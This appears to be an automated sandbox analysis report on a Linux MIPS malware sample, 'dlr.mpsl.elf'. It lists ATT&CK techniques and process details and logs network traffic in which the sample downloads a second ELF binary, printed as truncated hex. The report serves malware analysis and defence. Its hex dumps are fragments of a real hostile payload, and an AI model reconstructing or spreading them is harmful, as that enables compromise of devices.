Dec 21, 2024 04:41:57.715764999 CET	46	OUT	GET /mpsl HTTP/1.0 Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY
Dec 21, 2024 04:41:58.984900951 CET	712	IN	HTTP/1.0 200 OK Accept-Ranges: bytes Content-Length: 105780 Content-Type: application/octet-stream Last-Modified: Sat, 21 Dec 2024 03:10:52 GMT Date: Sat, 21 Dec 2024 03:41:58 GMT Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 08 00 01 00 00 00 60 02 40 00 34 00 00 00 04 9b 01 00 07 10 00 00 34 00 20 00 03 00 28 00 0e 00 0d 00 01 00 00 00 00 00 00 00 00 00 40 00 00 00 40 00 90 8c 01 00 90 8c 01 00 05 00 00 00 00 00 01 00 01 00 00 00 00 90 01 00 00 90 45 00 00 90 45 00 a0 0a 00 00 48 5c 00 00 06 00 00 00 00 00 01 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 06 00 1c 3c 1c 14 9c 27 21 e0 99 03 e0 ff bd 27 10 00 bc af 1c 00 bf af 18 00 bc af 01 00 11 04 00 00 00 00 06 00 1c 3c f8 13 9c 27 21 e0 9f 03 20 80 99 8f 00 00 00 00 dc 01 39 27 09 f8 20 03 00 00 00 00 10 00 bc 8f 00 00 00 00 01 00 11 04 00 00 00 00 06 00 1c 3c c8 13 9c 27 21 e0 9f 03 24 80 99 8f 00 00 00 00 80 6a 39 27 09 f8 20 03 00 00 00 00 10 00 bc 8f 00 00 00 00 1c 00 bf 8f 00 00 00 00 08 00 e0 03 20 00 bd 27 06 00 1c 3c 90 13 9c 27 21 e0 99 03 d8 ff bd 27 20 00 bf af 1c 00 b1 af 18 00 b0 af 10 00 bc af 18 80 91 8f 00 00 00 00 d0 9a 22 92 00 00 00 00 1d 00 [TRUNCATED] Data Ascii: ELF`@44 (@@EEH\Qtd<'!'<'! 9' <'!$j9' '<'!' "@Y B$ Y B$@$ $$" ('<'!'
Dec 21, 2024 04:41:58.985050917 CET	1236	IN	Data Raw: ac 81 99 8f 90 8c 84 24 05 00 40 10 d4 9a a5 24 09 f8 20 03 00 00 00 00 10 00 bc 8f 00 00 00 00 18 80 84 8f b8 81 99 8f 10 90 82 8c 00 00 00 00 06 00 40 10 10 90 84 24 04 00 20 13 00 00 00 00 18 00 bf 8f 08 00 20 03 20 00 bd 27 18 00 bf 8f 00 00 Data Ascii: $@$ @$ ' '!<D'!!('$$'P <'!'0,($
Dec 21, 2024 04:41:58.985088110 CET	1236	IN	Data Raw: 44 00 b5 8f 40 00 b4 8f 3c 00 b3 8f 38 00 b2 8f 34 00 b1 8f 30 00 b0 8f 08 00 20 03 58 00 bd 27 00 00 42 82 00 00 00 00 1d 00 40 14 ff 00 56 30 24 00 a0 af 34 82 99 8f 00 00 00 00 09 f8 20 03 00 00 00 00 02 2a 15 00 00 ff a3 32 18 00 bc 8f 00 ff Data Ascii: D@<840 X'B@V0$4 *206&@%f% (% $ D0 !0\! $$&@&B$`P&+p@$$R
Dec 21, 2024 04:41:58.985126019 CET	1236	IN	Data Raw: 24 09 9c 27 21 e0 99 03 90 ff bd 27 6c 00 bf af 68 00 be af 64 00 b7 af 60 00 b6 af 5c 00 b5 af 58 00 b4 af 54 00 b3 af 50 00 b2 af 4c 00 b1 af 48 00 b0 af 18 00 bc af 5c 84 99 8f ff 00 92 30 74 00 a5 af 21 20 40 02 04 00 05 24 21 80 e0 00 09 f8 Data Ascii: $'!'lhd`\XTPLH\0t! @$! 0! !($4 !@! !($4 T0C04bb0%b\! @ $@!@0@4t '!$
Dec 21, 2024 04:41:58.985176086 CET	1236	IN	Data Raw: 11 00 06 24 10 00 bc 8f ff ff 03 24 01 00 73 26 28 84 99 8f 21 20 40 00 18 00 a5 27 10 00 06 24 04 00 f7 26 56 00 43 10 00 00 42 ae 02 00 02 24 18 00 a2 a7 1a 00 be a7 09 f8 20 03 1c 00 a0 af 14 00 22 92 10 00 bc 8f 20 00 42 2c 78 83 99 8f d1 ff Data Ascii: $$s&(! @'$&VCB$ " B,x@!( 0 <$ 2&."%e%%!<$2&%D%%0D!( $R&t1&
Dec 21, 2024 04:41:58.985208988 CET	1236	IN	Data Raw: 01 00 31 26 10 00 bc 8f f5 ff 51 16 04 00 10 26 ee ff 40 1a 00 00 00 00 ee ff 00 10 00 00 00 00 09 f8 20 03 00 00 00 00 10 00 bc 8f a5 ff 00 10 02 00 22 a6 5c 00 bf 8f 58 00 be 8f 54 00 b7 8f 50 00 b6 8f 4c 00 b5 8f 48 00 b4 8f 44 00 b3 8f 40 00 Data Ascii: 1&Q&@ "\XTPLHD@<8`'x B0o,!!!P! !(`!D!(!0`@$ &1&@<'!
Dec 21, 2024 04:41:58.985244036 CET	1236	IN	Data Raw: 00 00 00 00 09 f8 20 03 21 28 60 02 10 00 bc 8f 21 88 40 00 98 81 99 8f 00 00 00 00 09 f8 20 03 21 20 00 02 21 10 20 02 10 00 bc 8f 38 00 bf 8f 34 00 b3 8f 30 00 b2 8f 2c 00 b1 8f 28 00 b0 8f 08 00 e0 03 40 00 bd 27 06 00 1c 3c 80 fa 9c 27 21 e0 Data Ascii: !(`!@ ! ! 840,(@'<'!p'\|xtplh\0! $! 0! !($!8 (B0! !($4 XB0
Dec 21, 2024 04:41:58.985362053 CET	1236	IN	Data Raw: 00 00 00 00 71 00 50 11 00 00 00 00 cc 83 99 8f 40 00 a5 8f 09 f8 20 03 28 00 24 26 18 00 bc 8f 21 20 20 02 f4 82 99 8f 00 00 00 00 09 f8 20 03 14 00 05 24 18 00 bc 8f 21 20 20 02 c4 85 99 8f 0a 00 22 a6 21 28 40 02 21 30 e0 02 09 f8 20 03 10 00 Data Ascii: qP@ ($&! $! "!(@!0 @CB$\c!0@$ &&s&xp <$ 2."f%e%%!
Dec 21, 2024 04:41:58.985415936 CET	1236	IN	Data Raw: ff ff 42 30 03 8e 11 00 64 01 a2 af b8 01 e0 1a 50 01 b1 af 54 01 a6 8f 64 01 a7 8f 28 00 c6 24 ff ff c2 30 ff 00 43 30 00 1a 03 00 02 12 02 00 25 10 43 00 a8 01 a2 af 58 01 a2 8f 28 00 a3 27 ff 00 42 30 01 00 44 32 a0 01 a6 af 94 01 a2 af ff 00 Data Ascii: B0dPTd($0C0%CX('B0D20Xd2"2223+s28'H'$'LH\|!$t$$ !0i^
Dec 21, 2024 04:41:58.985456944 CET	1236	IN	Data Raw: 00 00 00 00 60 00 a3 8f 64 00 a2 8f ff 00 04 3c 24 38 64 00 24 30 44 00 00 ff 65 30 00 ff 44 30 00 46 02 00 00 4e 03 00 02 3a 07 00 02 32 06 00 00 22 04 00 00 2a 05 00 02 16 02 00 02 1e 03 00 25 20 88 00 25 28 a9 00 25 18 67 00 25 10 46 00 5e 00 Data Ascii: `d<$8d$0De0D0FN:2"*% %(%g%F^%e%DKFCJ B!@B$$F$@B4$$C\+ GB4$F"#'h&x'`!"%0&&
Dec 21, 2024 04:41:59.105078936 CET	1236	IN	Data Raw: 00 3a 07 00 00 52 0a 00 00 5a 0b 00 00 42 08 00 00 4a 09 00 00 62 0c 00 02 6a 17 00 02 12 02 00 02 2a 05 00 02 72 16 00 02 7a 15 00 02 1a 03 00 25 30 c4 00 25 38 ed 00 25 10 4a 00 25 28 ab 00 25 70 c8 01 25 78 e9 01 25 98 6c 00 21 80 00 00 3c 00 Data Ascii: :RZBJbjrz%0%8%J%(%p%x%l!<840,(" ,P$(CSDh` \$ $\ ! \!dp$$$C@B4$DB

System Behavior

Analysis Process: dlr.mpsl.elf PID: 5430, Parent PID: 5354

General

Start time (UTC):	03:41:56
Start date (UTC):	21/12/2024
Path:	/tmp/dlr.mpsl.elf
Arguments:	/tmp/dlr.mpsl.elf
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report dlr.mpsl.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Dropped Files

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/tmp/Galaxy

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

HTTP Packets

System Behavior

Analysis Process: dlr.mpsl.elf PID: 5430, Parent PID: 5354

General

Chronological Activities

Linux Analysis Report
dlr.mpsl.elf